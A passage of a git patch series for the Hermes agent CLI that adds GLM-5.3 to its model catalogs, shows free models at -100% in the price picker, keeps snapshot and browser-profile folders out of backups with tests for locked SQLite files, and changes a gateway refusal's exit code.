hit the - # generic 202K fallback. + # GLM — GLM-5.2 and GLM-5.3 ship with a 1M context window. GLM-5.2 was + # verified empirically (needle-in-a-haystack retrieval at 789K prompt + # tokens succeeded with zero errors on api.z.ai/api/coding/paas/v4). + # GLM-5.3 uses the same base model (all gains are post-training) with + # 1M context / 128K max output per docs.z.ai/guides/llm/glm-5.3 + # (verified 2026-08-14). Older GLM models (5, 5.1, 5-turbo) are ~202K. + # Longest-key-first substring matching ensures "glm-5.2"/"glm-5.3" + # resolve to 1M while older variants still hit the generic 202K fallback. "glm-5.2": 1_048_576, # OpenRouter's free GLM-5.2 variant is capped at 256K (live metadata, # 2026-08-21) — longer key wins over the 1M paid entry above. "glm-5.2:free": 256_000, + "glm-5.3": 1_048_576, "glm": 202752, # xAI Grok — xAI /v1/models does not return context_length metadata, # so these hardcoded fallbacks prevent Hermes from probing-down to diff --git a/hermes_cli/auth.py b/hermes_cli/auth.py index ae807b9bfe..c94bf4ab34 100644 --- a/hermes_cli/auth.py +++ b/hermes_cli/auth.py @@ -743,8 +743,8 @@ ZAI_ENDPOINTS = [ # (id, base_url, probe_models, label) ("global", "https://api.z.ai/api/paas/v4", ["glm-5"], "Global"), ("cn", "https://open.bigmodel.cn/api/paas/v4", ["glm-5"], "China"), - ("coding-global", "https://api.z.ai/api/coding/paas/v4", ["glm-5.2", "glm-5.1", "glm-5v-turbo", "glm-4.7"], "Global (Coding Plan)"), - ("coding-cn", "https://open.bigmodel.cn/api/coding/paas/v4", ["glm-5.2", "glm-5.1", "glm-5v-turbo", "glm-4.7"], "China (Coding Plan)"), + ("coding-global", "https://api.z.ai/api/coding/paas/v4", ["glm-5.3", "glm-5.2", "glm-5.1", "glm-5v-turbo", "glm-4.7"], "Global (Coding Plan)"), + ("coding-cn", "https://open.bigmodel.cn/api/coding/paas/v4", ["glm-5.3", "glm-5.2", "glm-5.1", "glm-5v-turbo", "glm-4.7"], "China (Coding Plan)"), ] diff --git a/hermes_cli/models.py b/hermes_cli/models.py index d607a63a7b..63efab9681 100644 --- a/hermes_cli/models.py +++ b/hermes_cli/models.py @@ -116,7 +116,8 @@ OPENROUTER_MODELS: list[tuple[str, str]] = [ # MiniMax ("minimax/minimax-m3", ""), # Z-AI - ("z-ai/glm-5.2", "default"), + ("z-ai/glm-5.3", "default"), + ("z-ai/glm-5.2", ""), ("z-ai/glm-5.1", ""), # Xiaomi ("xiaomi/mimo-v2.5-pro", ""), @@ -294,6 +295,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = { # MiniMax "minimax/minimax-m3", # Z-AI + "z-ai/glm-5.3", "z-ai/glm-5.2", "z-ai/glm-5.1", # Xiaomi @@ -373,6 +375,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = { "gemini-3.1-flash-lite-preview", ], "zai": [ + "glm-5.3", "glm-5.2", "glm-5.1", "glm-5", @@ -391,6 +394,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = { "nvidia/nemotron-3-nano-omni-30b-a3b-reasoning", # Third-party agentic models hosted on build.nvidia.com # (map to OpenRouter defaults — users get familiar picks on NIM) + "z-ai/glm-5.3", "z-ai/glm-5.2", "moonshotai/kimi-k2.6", "minimaxai/minimax-m3", @@ -542,6 +546,7 @@ _PROVIDER_MODELS: dict[str, list[str]] = { "minimax-m3", "minimax-m2.7", "minimax-m2.5", + "glm-5.3", "glm-5.2", "glm-5.1", "glm-5", diff --git a/plugins/model-providers/zai/__init__.py b/plugins/model-providers/zai/__init__.py index 322068617e..2828caff92 100644 --- a/plugins/model-providers/zai/__init__.py +++ b/plugins/model-providers/zai/__init__.py @@ -47,22 +47,28 @@ def _model_supports_thinking(model: str | None) -> bool: def _is_glm_5_2(model: str | None) -> bool: - """Detect GLM-5.2 across the alias spellings providers use. + """Detect GLM-5.2/5.3 (reasoning_effort-capable) across alias spellings. - Covers the canonical ``glm-5.2`` plus the ``glm-5-2`` / ``glm-5p2`` - variants seen on relays (Fireworks ``glm-5p2``, etc.) and any - vendor-prefixed form (``z-ai/glm-5.2``, ``zai-org-glm-5-2``). + Covers the canonical ``glm-5.2``/``glm-5.3`` plus the ``glm-5-2`` / + ``glm-5p2`` variants seen on relays (Fireworks ``glm-5p2``, etc.) and any + vendor-prefixed form (``z-ai/glm-5.2``, ``zai-org-glm-5-2``). GLM-5.3 + uses the same base model as 5.2 (post-training gains only) and exposes + the same ``reasoning_effort`` knob (verified live 2026-08-14: the + coding-plan endpoint accepts ``reasoning_effort: high`` for glm-5.3). """ m = (model or "").strip().lower() if not m: return False - return any(token in m for token in ("glm-5.2", "glm-5-2", "glm-5p2")) + return any( + token in m + for token in ("glm-5.2", "glm-5-2", "glm-5p2", "glm-5.3", "glm-5-3", "glm-5p3") + ) def _glm_5_2_reasoning_effort(reasoning_config: dict | None) -> str | None: - """Map Hermes reasoning effort onto GLM-5.2's native ``high``/``max``. + """Map Hermes reasoning effort onto GLM-5.2/5.3's native ``high``/``max``. - GLM-5.2 only supports two enabled effort levels. ``xhigh``/``max``/``ultra`` + These models only support two enabled effort levels. ``xhigh``/``max``/``ultra`` request the top tier; everything else that is enabled requests ``high`` (its minimum thinking level). When reasoning is explicitly disabled, or no effort preference is supplied, the server default is left untouched. From 907da145b6af089927a6d08904260f86f3813323 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 13:51:55 -0700 Subject: [PATCH 044/161] feat(models): glm-5.3 replaces glm-5.1 in the OpenRouter and Nous Portal catalogs MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Follow-up to the salvaged GLM-5.3 support commit: drop z-ai/glm-5.1 from both curated lists per Teknium's direction (glm-5.2 keeps the 'default' tag), and regenerate the docs manifest. glm-5.1 remains available via live discovery and on out-of-scope surfaces (zai plugin, setup defaults, opencode-go) — named leftovers, not silently swept. --- hermes_cli/models.py | 6 ++---- website/static/api/model-catalog.json | 16 ++++++++-------- 2 files changed, 10 insertions(+), 12 deletions(-) diff --git a/hermes_cli/models.py b/hermes_cli/models.py index 63efab9681..7cea7eec44 100644 --- a/hermes_cli/models.py +++ b/hermes_cli/models.py @@ -116,9 +116,8 @@ OPENROUTER_MODELS: list[tuple[str, str]] = [ # MiniMax ("minimax/minimax-m3", ""), # Z-AI - ("z-ai/glm-5.3", "default"), - ("z-ai/glm-5.2", ""), - ("z-ai/glm-5.1", ""), + ("z-ai/glm-5.3", ""), + ("z-ai/glm-5.2", "default"), # Xiaomi ("xiaomi/mimo-v2.5-pro", ""), # Tencent @@ -297,7 +296,6 @@ _PROVIDER_MODELS: dict[str, list[str]] = { # Z-AI "z-ai/glm-5.3", "z-ai/glm-5.2", - "z-ai/glm-5.1", # Xiaomi "xiaomi/mimo-v2.5-pro", # Tencent diff --git a/website/static/api/model-catalog.json b/website/static/api/model-catalog.json index f824a0b89a..fb2e92547a 100644 --- a/website/static/api/model-catalog.json +++ b/website/static/api/model-catalog.json @@ -1,6 +1,6 @@ { "version": 1, - "updated_at": "2026-08-21T19:47:17Z", + "updated_at": "2026-08-21T20:49:36Z", "metadata": { "source": "hermes-agent repo", "docs": "https://hermes-agent.nousresearch.com/docs/reference/model-catalog" @@ -116,15 +116,15 @@ "id": "minimax/minimax-m3", "description": "" }, + { + "id": "z-ai/glm-5.3", + "description": "" + }, { "id": "z-ai/glm-5.2", "description": "default", "default": true }, - { - "id": "z-ai/glm-5.1", - "description": "" - }, { "id": "xiaomi/mimo-v2.5-pro", "description": "" @@ -266,11 +266,11 @@ "id": "minimax/minimax-m3" }, { - "id": "z-ai/glm-5.2", - "default": true + "id": "z-ai/glm-5.3" }, { - "id": "z-ai/glm-5.1" + "id": "z-ai/glm-5.2", + "default": true }, { "id": "xiaomi/mimo-v2.5-pro" From 098a7acd4ab0e8b33ee5a92ba69a5d8eb194b2da Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 13:52:00 -0700 Subject: [PATCH 045/161] add openclaww@gmail.com to contributors --- contributors/emails/openclaww@gmail.com | 1 + 1 file changed, 1 insertion(+) create mode 100644 contributors/emails/openclaww@gmail.com diff --git a/contributors/emails/openclaww@gmail.com b/contributors/emails/openclaww@gmail.com new file mode 100644 index 0000000000..674ca68564 --- /dev/null +++ b/contributors/emails/openclaww@gmail.com @@ -0,0 +1 @@ +openclaww-xz From bd93a5f3160dc84d1891e27b49bffeb88483d8f0 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 13:42:04 -0700 Subject: [PATCH 046/161] feat(models): free models show star + -100% in the model picker discount column Free ($0/$0) Nous Portal models sat with a blank discount column and no sale star (stealth/ox-alpha, upstage/solar-pro4:free), reading as missing data next to the -20% sale rows. compute_sale_discount now returns a flat 100% for free models; was_* raws pass through only when the gateway served a pricing.original, so natively-free models render bare '-100%' with no fabricated 'was ?/?'. CLI picker star follows on_sale automatically; inventory feed carries discount_percent=100 to Desktop, whose FREE badge row now renders the amber -100% pill beside it. --- apps/desktop/src/components/model-picker.tsx | 26 +++++++++++---- hermes_cli/auth.py | 29 ++++++++++------ hermes_cli/inventory.py | 5 +-- hermes_cli/models.py | 35 ++++++++++++++------ tests/hermes_cli/test_inventory_pricing.py | 22 ++++++++---- tests/hermes_cli/test_sale_pricing.py | 14 ++++++++ 6 files changed, 94 insertions(+), 37 deletions(-) diff --git a/apps/desktop/src/components/model-picker.tsx b/apps/desktop/src/components/model-picker.tsx index b835b6d88c..4f5415f920 100644 --- a/apps/desktop/src/components/model-picker.tsx +++ b/apps/desktop/src/components/model-picker.tsx @@ -263,13 +263,25 @@ function ModelPrice({ price, isCurrent }: { price?: ModelPricing; isCurrent: boo if (price.free) { return ( - - {copy.free} + + {typeof price.discount_percent === 'number' ? ( + + -{price.discount_percent}% + + ) : null} + + {copy.free} + ) } diff --git a/hermes_cli/auth.py b/hermes_cli/auth.py index c94bf4ab34..2b1d4e4a45 100644 --- a/hermes_cli/auth.py +++ b/hermes_cli/auth.py @@ -7693,16 +7693,22 @@ def _prompt_model_selection( if sale is not None: any_on_sale = True pct, was_prompt_raw, was_out_raw = sale - was_inp = ( - _format_price_per_mtok(was_prompt_raw) - if was_prompt_raw != "" - else "?" - ) - was_out = ( - _format_price_per_mtok(was_out_raw) - if was_out_raw != "" - else "?" - ) + # Natively-free models (no gateway original) carry + # empty was_* raws — leave them empty so the row + # shows bare "-100%" with no "was ?/?" suffix. + if was_prompt_raw == "" and was_out_raw == "": + was_inp = was_out = "" + else: + was_inp = ( + _format_price_per_mtok(was_prompt_raw) + if was_prompt_raw != "" + else "?" + ) + was_out = ( + _format_price_per_mtok(was_out_raw) + if was_out_raw != "" + else "?" + ) else: inp, out, cache = "", "", "" _price_cache[mid] = (inp, out, cache, pct, was_inp, was_out) @@ -7739,7 +7745,8 @@ def _prompt_model_selection( segs = [*name_segs, (price_part, None)] if on_sale: segs.append((f" -{pct}%", "yellow")) - segs.append((f" was {was_inp}/{was_out}", "dim")) + if was_inp or was_out: + segs.append((f" was {was_inp}/{was_out}", "dim")) if mid == current_model: segs.append((" ← currently in use", None)) return segs diff --git a/hermes_cli/inventory.py b/hermes_cli/inventory.py index 3ef41d6586..bce98ef1e6 100644 --- a/hermes_cli/inventory.py +++ b/hermes_cli/inventory.py @@ -882,8 +882,9 @@ def _apply_pricing( # Sale chrome is Nous Portal-only. Other providers (OpenRouter, # Novita, …) never get discount_percent / was_* even if a nested # pricing.original somehow appeared in their catalog. Free / $0 - # models never get sale chrome either — even if original leaked. - if slug == "nous" and not is_free: + # models get flat -100% chrome (was_* only when the gateway + # served an original). + if slug == "nous": sale = compute_sale_discount( inp_raw, out_raw, p.get("original") ) diff --git a/hermes_cli/models.py b/hermes_cli/models.py index 7cea7eec44..d8e09781bd 100644 --- a/hermes_cli/models.py +++ b/hermes_cli/models.py @@ -2306,15 +2306,13 @@ def compute_sale_discount( that rounds below 1% is treated as no sale (never render "-0%"). Returns ``None`` when there is no sale (missing/equal/invalid original), so UIs show normal prices. + + Free / $0 models are a special case: they are always "-100%" sale chrome + (Teknium, Aug 2026 — the picker's discount column should say 100% off + rather than sit blank on free rows). The ``was_*`` raws come from + ``original`` when the gateway serves one and are empty strings otherwise; + callers must skip the "was" segment when both are empty. """ - if not isinstance(original, dict): - return None - - was_prompt = original.get("prompt") - was_completion = original.get("completion") - if was_prompt in (None, "") and was_completion in (None, ""): - return None - def _finite(raw: Any) -> float | None: try: n = float(raw) @@ -2329,11 +2327,26 @@ def compute_sale_discount( return None return n if n >= 0 and n == n else None - # Free / $0 models never show sale chrome, even if a leftover list price - # is higher (e.g. a :free sibling that inherited pricing.original). + orig_dict = original if isinstance(original, dict) else {} + was_prompt = orig_dict.get("prompt") + was_completion = orig_dict.get("completion") + + # Free / $0 models: flat 100% off, with "was" prices only when the + # gateway actually served an original (e.g. a :free sibling); a + # natively-free model (stealth/ox-alpha) gets bare "-100%" chrome. cur_prompt_any = _nonneg(prompt) if prompt not in (None, "") else None cur_comp_any = _nonneg(completion) if completion not in (None, "") else None - if cur_prompt_any == 0 and cur_comp_any == 0: + if cur_prompt_any == 0 and cur_comp_any in (0, None): + return ( + 100, + str(was_prompt) if was_prompt not in (None, "") else "", + str(was_completion) if was_completion not in (None, "") else "", + ) + + if not isinstance(original, dict): + return None + + if was_prompt in (None, "") and was_completion in (None, ""): return None cur_prompt = _finite(prompt) if prompt not in (None, "") else None diff --git a/tests/hermes_cli/test_inventory_pricing.py b/tests/hermes_cli/test_inventory_pricing.py index c529db9eae..5fb7c39490 100644 --- a/tests/hermes_cli/test_inventory_pricing.py +++ b/tests/hermes_cli/test_inventory_pricing.py @@ -42,8 +42,8 @@ def test_apply_pricing_formats_per_model_prices(monkeypatch): assert pricing["b/free"]["input"] == "free" -def test_apply_pricing_omits_sale_for_free_models_even_with_original(monkeypatch): - """Free models must not get was_*/discount_percent even if original leaked.""" +def test_apply_pricing_free_models_get_flat_100_percent_sale(monkeypatch): + """Free models show -100% chrome; was_* only when original was served.""" _patch_pricing( monkeypatch, free_tier=False, @@ -57,16 +57,26 @@ def test_apply_pricing_omits_sale_for_free_models_even_with_original(monkeypatch "completion": "0.00001", }, }, + "b/natively-free": { + "prompt": "0", + "completion": "0", + }, } }, ) - rows = [{"slug": "nous", "models": ["a/free"]}] + rows = [{"slug": "nous", "models": ["a/free", "b/natively-free"]}] inv._apply_pricing(rows) free = rows[0]["pricing"]["a/free"] assert free["free"] is True - assert "discount_percent" not in free - assert "was_input" not in free - assert "was_output" not in free + assert free["discount_percent"] == 100 + assert free["was_input"] == "$2.00" + assert free["was_output"] == "$10.00" + native = rows[0]["pricing"]["b/natively-free"] + assert native["free"] is True + assert native["discount_percent"] == 100 + # No gateway original → no fabricated was prices. + assert "was_input" not in native + assert "was_output" not in native def test_apply_pricing_omits_sale_when_original_not_cheaper(monkeypatch): diff --git a/tests/hermes_cli/test_sale_pricing.py b/tests/hermes_cli/test_sale_pricing.py index 0fa2720fb2..251a65af10 100644 --- a/tests/hermes_cli/test_sale_pricing.py +++ b/tests/hermes_cli/test_sale_pricing.py @@ -12,6 +12,20 @@ from hermes_cli.models import ( ) +def test_free_model_gets_flat_100_percent_discount(): + """$0/$0 models always show -100%; was_* pass through when present.""" + assert compute_sale_discount("0", "0", None) == (100, "", "") + assert compute_sale_discount( + "0", "0", {"prompt": "0.000002", "completion": "0.00001"} + ) == (100, "0.000002", "0.00001") + # "0.0000000000" strings (Nous portal shape) count as free too. + assert compute_sale_discount("0.0000000000", "0.0000000000", None) == (100, "", "") + + +def test_paid_model_without_original_shows_no_sale(): + assert compute_sale_discount("0.000002", "0.00001", None) is None + + From f9849c43a24d410cbc937daa2216c811b729b578 Mon Sep 17 00:00:00 2001 From: Simon Date: Sat, 15 Aug 2026 18:25:35 +0800 Subject: [PATCH 047/161] fix(backup): don't nest state-snapshots/ into full backups MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit `hermes backup` already skips `backups/` so a full zip never re-ships earlier pre-update zips. `state-snapshots/` (written by `hermes backup --quick`, `/snapshot create`, and the pre-update safety net) has the same shape — every retained snapshot holds its own copy of state.db — but was not in `_EXCLUDED_DIRS`, so a full backup shipped the DB once per retained snapshot on top of the live one. Two places hit this in practice: - `hermes update` in `full` mode takes the quick snapshot *before* the full zip, so the pre-update zip always nests the snapshot it just made (state.db twice in every pre-update-*.zip). - Any recurring `hermes backup --quick` (default keep=20) makes a daily `hermes backup` grow by roughly one compressed state.db per retained snapshot; a 750 MB state.db with two snapshots on disk pushed a daily zip from 1.8 GB to 2.3 GB. Add `_QUICK_SNAPSHOTS_DIR` to `_EXCLUDED_DIRS` (moving the constant up next to the exclusion rules so there is one source of truth). Both walk sites and `_should_exclude` share the set, so `hermes backup`, the pre-update zip and the auto-backup path all pick it up. Restoring snapshots after a machine move was never the point of the full backup — `profiles.py` already excludes `state-snapshots/` from `--clone-all` for the same reason. Tests: unit case next to the `backups/` one, plus two end-to-end cases that use the real `create_quick_snapshot` producer and assert the zip carries exactly one state.db (full backup and pre-update-order). --- hermes_cli/backup.py | 10 +++- tests/hermes_cli/test_backup.py | 64 ++++++++++++++++++++++++++ website/docs/reference/cli-commands.md | 2 +- 3 files changed, 74 insertions(+), 2 deletions(-) diff --git a/hermes_cli/backup.py b/hermes_cli/backup.py index 30e3b6cce3..3dba945e13 100644 --- a/hermes_cli/backup.py +++ b/hermes_cli/backup.py @@ -44,6 +44,11 @@ logger = logging.getLogger(__name__) # Exclusion rules # --------------------------------------------------------------------------- +# Where ``hermes backup --quick`` / ``/snapshot`` / the pre-update safety net +# write their state snapshots (see ``create_quick_snapshot`` below). Defined up +# here because the exclusion set needs it. +_QUICK_SNAPSHOTS_DIR = "state-snapshots" + # Directory names to skip entirely (matched against each path component) # ``hermes-agent`` is special-cased to root level only in ``_should_exclude`` # so that skill directories like ``skills/autonomous-ai-agents/hermes-agent/`` @@ -66,6 +71,9 @@ _EXCLUDED_DIRS = { ".git", # nested git dirs (profiles shouldn't have these, but safety) "node_modules", # js deps — reinstalled on demand "backups", # prior auto-backups — don't nest backups exponentially + _QUICK_SNAPSHOTS_DIR, # quick/pre-update state snapshots — same reason as + # ``backups``: each holds a full copy of state.db, so + # zipping them re-ships the DB once per snapshot "checkpoints", # session-local trajectory caches — regenerated per-session, # session-hash-keyed so they don't port to another machine anyway # Python dependency trees (plugin / MCP-server venvs under HERMES_HOME) — @@ -1309,7 +1317,7 @@ _QUICK_STATE_FILES = ( "feishu_comment_pairing.json", # Feishu comment subscription pairings ) -_QUICK_SNAPSHOTS_DIR = "state-snapshots" +# ``_QUICK_SNAPSHOTS_DIR`` lives with the exclusion rules at the top of the module. _QUICK_DEFAULT_KEEP = 20 diff --git a/tests/hermes_cli/test_backup.py b/tests/hermes_cli/test_backup.py index 9b12eca467..ecef05fbef 100644 --- a/tests/hermes_cli/test_backup.py +++ b/tests/hermes_cli/test_backup.py @@ -133,6 +133,19 @@ class TestShouldExclude: from hermes_cli.backup import _should_exclude assert _should_exclude(Path("backups/pre-update-2026-04-27-063400.zip")) + def test_excludes_state_snapshots_dir(self): + """state-snapshots/ is excluded for the same reason as backups/: every + quick / pre-update snapshot holds its own copy of state.db, so zipping + the tree would ship the DB once per retained snapshot.""" + from hermes_cli.backup import _EXCLUDED_DIRS, _QUICK_SNAPSHOTS_DIR, _should_exclude + assert _QUICK_SNAPSHOTS_DIR in _EXCLUDED_DIRS + assert _should_exclude(Path(_QUICK_SNAPSHOTS_DIR) / "20260814-203829-2026-08-15" / "state.db") + assert _should_exclude(Path(_QUICK_SNAPSHOTS_DIR) / "20260814-203829-2026-08-15" / "manifest.json") + # Named profiles accumulate snapshots too. + assert _should_exclude(Path("profiles/coder") / _QUICK_SNAPSHOTS_DIR / "x" / "state.db") + # The live DB is still backed up. + assert not _should_exclude(Path("state.db")) + def test_excludes_sqlite_sidecars(self): """SQLite WAL/SHM/journal sidecars must not ship alongside the safe-copied .db — pairing a fresh snapshot with stale sidecar state @@ -241,6 +254,35 @@ class TestBackup: assert "skills/outside-link.txt" not in names assert all(zf.read(name) != b"outside secret\n" for name in names) + def test_state_snapshots_not_nested_into_backup(self, tmp_path, monkeypatch): + """A quick snapshot left under state-snapshots/ must not be re-shipped + by the full backup — each snapshot already holds a copy of state.db, so + nesting them multiplies the archive by (1 + retained snapshots).""" + hermes_home = tmp_path / ".hermes" + hermes_home.mkdir() + _make_hermes_tree(hermes_home) + with sqlite3.connect(hermes_home / "state.db") as conn: + conn.execute("CREATE TABLE sessions (id TEXT PRIMARY KEY)") + conn.execute("INSERT INTO sessions VALUES ('s1')") + + from hermes_cli.backup import _QUICK_SNAPSHOTS_DIR, create_quick_snapshot, run_backup + + # Real producer, so the layout under state-snapshots/ is whatever the + # code actually writes (manifest.json + state.db copy + ...). + snap_id = create_quick_snapshot(hermes_home=hermes_home) + assert snap_id and (hermes_home / _QUICK_SNAPSHOTS_DIR / snap_id / "state.db").exists() + + monkeypatch.setenv("HERMES_HOME", str(hermes_home)) + monkeypatch.setattr(Path, "home", lambda: tmp_path) + out_zip = tmp_path / "backup.zip" + run_backup(Namespace(output=str(out_zip))) + + with zipfile.ZipFile(out_zip, "r") as zf: + names = zf.namelist() + assert not any(n.startswith(_QUICK_SNAPSHOTS_DIR + "/") for n in names), names + # Exactly one state.db in the archive: the live one. + assert [n for n in names if n == "state.db" or n.endswith("/state.db")] == ["state.db"] + # --------------------------------------------------------------------------- # _validate_backup_zip tests @@ -1410,6 +1452,28 @@ class TestPreUpdateBackup: # pid files excluded assert "gateway.pid" not in names + def test_pre_update_zip_does_not_nest_the_pre_update_snapshot(self, hermes_home): + """``hermes update`` in ``full`` mode takes the quick snapshot *before* + the full zip, so the zip walk sees the snapshot it just made. It must + skip it — otherwise every pre-update zip ships state.db twice.""" + from hermes_cli.backup import ( + _QUICK_SNAPSHOTS_DIR, + create_pre_update_backup, + create_quick_snapshot, + ) + with sqlite3.connect(hermes_home / "state.db") as conn: + conn.execute("CREATE TABLE sessions (id TEXT PRIMARY KEY)") + + snap_id = create_quick_snapshot(label="pre-update", hermes_home=hermes_home) + assert snap_id and (hermes_home / _QUICK_SNAPSHOTS_DIR / snap_id / "state.db").exists() + + out = create_pre_update_backup(hermes_home=hermes_home) + assert out is not None + with zipfile.ZipFile(out) as zf: + names = zf.namelist() + assert "state.db" in names + assert not any(n.startswith(_QUICK_SNAPSHOTS_DIR + "/") for n in names), names + def test_rotation_keeps_only_n(self, hermes_home): """After more than ``keep`` backups are created, older ones are diff --git a/website/docs/reference/cli-commands.md b/website/docs/reference/cli-commands.md index 37871c0eea..a75f2a6e91 100644 --- a/website/docs/reference/cli-commands.md +++ b/website/docs/reference/cli-commands.md @@ -930,7 +930,7 @@ hermes debug share --local # Print report to terminal (no upload) hermes backup [options] ``` -Create a zip archive of your Hermes configuration, skills, sessions, and data. The backup excludes the hermes-agent codebase itself. +Create a zip archive of your Hermes configuration, skills, sessions, and data. The backup excludes the hermes-agent codebase itself, and it does not nest earlier backup artifacts (`backups/`, `state-snapshots/`) — each of those already contains its own copy of `state.db`. | Option | Description | |--------|-------------| From d422f7103ec6e43cf40abeb0d3c258a5244fdcd3 Mon Sep 17 00:00:00 2001 From: xthezealot <9503891+xthezealot@users.noreply.github.com> Date: Wed, 12 Aug 2026 12:44:52 +0200 Subject: [PATCH 048/161] fix(backup): don't hang forever on locked SQLite sources MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit hermes backup freezes mid-archive when a .db file under HERMES_HOME is locked by another process — e.g. a live Chromium profile database held with an exclusive lock by a running browser. sqlite3.Connection.backup() retries SQLITE_BUSY indefinitely and never honors the connection's busy timeout, while a plain statement on the same source fails cleanly after ~5s with "database is locked". Fixes: - Probe the source with a cheap read before snapshotting, so a locked database fails fast instead of hanging the whole backup. - Add a watchdog that interrupts the source connection after 15 minutes as a last resort for pathological cases. - Exclude browser-profiles/ from full backups: the CDP browser profile is live, regenerable (cache + re-login), and unsafe to snapshot while running. On a real install this cut the backup from 28,396 files / 1.1 GB to ~4,000 files / 548 MB, completing in ~33s instead of hanging. The pre-update automatic backup shares this code path and was equally at risk. Adds a regression test that holds an EXCLUSIVE transaction in a separate process and asserts _safe_copy_db returns False in bounded time. --- hermes_cli/backup.py | 6 +++++ tests/hermes_cli/test_backup.py | 45 +++++++++++++++++++++++++++++++++ 2 files changed, 51 insertions(+) diff --git a/hermes_cli/backup.py b/hermes_cli/backup.py index 3dba945e13..c9cee26ffc 100644 --- a/hermes_cli/backup.py +++ b/hermes_cli/backup.py @@ -76,6 +76,12 @@ _EXCLUDED_DIRS = { # zipping them re-ships the DB once per snapshot "checkpoints", # session-local trajectory caches — regenerated per-session, # session-hash-keyed so they don't port to another machine anyway + # Live browser profiles (e.g. the CDP Brave profile under browser-profiles/). + # Chromium holds its SQLite DBs with exclusive locks while running, and + # sqlite3.Connection.backup() retries SQLITE_BUSY forever instead of honoring + # the busy timeout — a full backup hangs mid-archive on the first locked DB. + # Profiles are regenerable (cache + re-login) and unsafe to snapshot live. + "browser-profiles", # Python dependency trees (plugin / MCP-server venvs under HERMES_HOME) — # regenerated by reinstalling; never irreplaceable state. ".venv", diff --git a/tests/hermes_cli/test_backup.py b/tests/hermes_cli/test_backup.py index ecef05fbef..6451b5080b 100644 --- a/tests/hermes_cli/test_backup.py +++ b/tests/hermes_cli/test_backup.py @@ -1135,6 +1135,51 @@ class TestSafeCopyDb: assert not dst.exists() + def test_locked_source_fails_fast_not_hang(self, tmp_path): + import subprocess + import sys + import time + + from hermes_cli.backup import _safe_copy_db + src = tmp_path / "locked.db" + dst = tmp_path / "copy.db" + + conn = sqlite3.connect(str(src)) + conn.execute("CREATE TABLE t (x INTEGER)") + conn.commit() + conn.close() + + # Hold an EXCLUSIVE transaction in a separate process. POSIX file + # locks only conflict across processes, so an in-process connection + # cannot reproduce the "database is locked" condition. + holder = ( + "import sqlite3, time\n" + f"c = sqlite3.connect({str(src)!r})\n" + "c.execute('BEGIN EXCLUSIVE')\n" + "print('LOCKED', flush=True)\n" + "time.sleep(60)\n" + ) + proc = subprocess.Popen( + [sys.executable, "-c", holder], + stdout=subprocess.PIPE, + text=True, + ) + try: + assert proc.stdout is not None + assert proc.stdout.readline().strip() == "LOCKED" + started = time.monotonic() + result = _safe_copy_db(src, dst) + elapsed = time.monotonic() - started + assert result is False + # The busy timeout is 5s, so a fast failure lands around there. + # The regression this guards against is backup() retrying + # SQLITE_BUSY forever, which would never return at all. + assert elapsed < 30 + finally: + proc.kill() + proc.wait() + + def test_is_zeroed_sqlite_file_detects_nul_header(self, tmp_path): from hermes_cli.backup import is_zeroed_sqlite_file p = tmp_path / "state.db" From bc8f49618c46e2075e1ec8b935080cfc0afbfb58 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 13:12:36 -0700 Subject: [PATCH 049/161] chore: map contributor email for S-Claw --- contributors/emails/tsungyuan.hung@gmail.com | 1 + 1 file changed, 1 insertion(+) create mode 100644 contributors/emails/tsungyuan.hung@gmail.com diff --git a/contributors/emails/tsungyuan.hung@gmail.com b/contributors/emails/tsungyuan.hung@gmail.com new file mode 100644 index 0000000000..e2a1bf114d --- /dev/null +++ b/contributors/emails/tsungyuan.hung@gmail.com @@ -0,0 +1 @@ +S-Claw From ac64f8a7e771a917b8366bd561b218f38d32a31d Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Sat, 22 Aug 2026 03:06:04 +0530 Subject: [PATCH 050/161] =?UTF-8?q?chore:=20AUTHOR=5FMAP=20=E2=80=94=20add?= =?UTF-8?q?=20samtcam@gmail.com=20=E2=86=92=20samclams?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit For PR #91806 salvage (multiplex refusal exit code fix). --- contributors/emails/samtcam@gmail.com | 1 + 1 file changed, 1 insertion(+) create mode 100644 contributors/emails/samtcam@gmail.com diff --git a/contributors/emails/samtcam@gmail.com b/contributors/emails/samtcam@gmail.com new file mode 100644 index 0000000000..94685d43d8 --- /dev/null +++ b/contributors/emails/samtcam@gmail.com @@ -0,0 +1 @@ +samclams \ No newline at end of file From 2fb1e62b2ee0723486893ed30d5b481f5ad0b5b6 Mon Sep 17 00:00:00 2001 From: Sam Campbell Date: Fri, 21 Aug 2026 13:42:03 -0700 Subject: [PATCH 051/161] fix(gateway): multiplex refusal must exit EX_CONFIG (78), not 1 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit `_guard_named_profile_under_multiplexer` correctly refuses a named-profile gateway while the default gateway is multiplexing — starting a second one would double-bind that profile's platforms. The refusal is right; its exit code was not. The refusal is decided entirely by configuration (`multiplex_profiles` plus the allowlist), so it is permanent: no number of retries can change the answer. Exiting 1 made it look transient to a service manager. That matters because this module generates the systemd unit, and the template pairs `Restart=always` / `RestartSec=5` with `StartLimitIntervalSec=0` — it deliberately trades systemd's generic start-rate limiter for the specific `RestartPreventExitStatus=GATEWAY_FATAL_CONFIG_EXIT_CODE` backstop declared three lines below it. Returning 1 left that backstop unarmed with the limiter already disabled, so a correct, permanent refusal became an unbounded restart loop. Observed on a host running `multiplex_profiles: true` with a leftover per-profile unit: 136 refusals in ~13 minutes, stopped only by hand. `GATEWAY_FATAL_CONFIG_EXIT_CODE` (78, EX_CONFIG) is this codebase's existing answer for exactly this case — `gateway/restart.py` documents it as the fatal configuration error that the s6 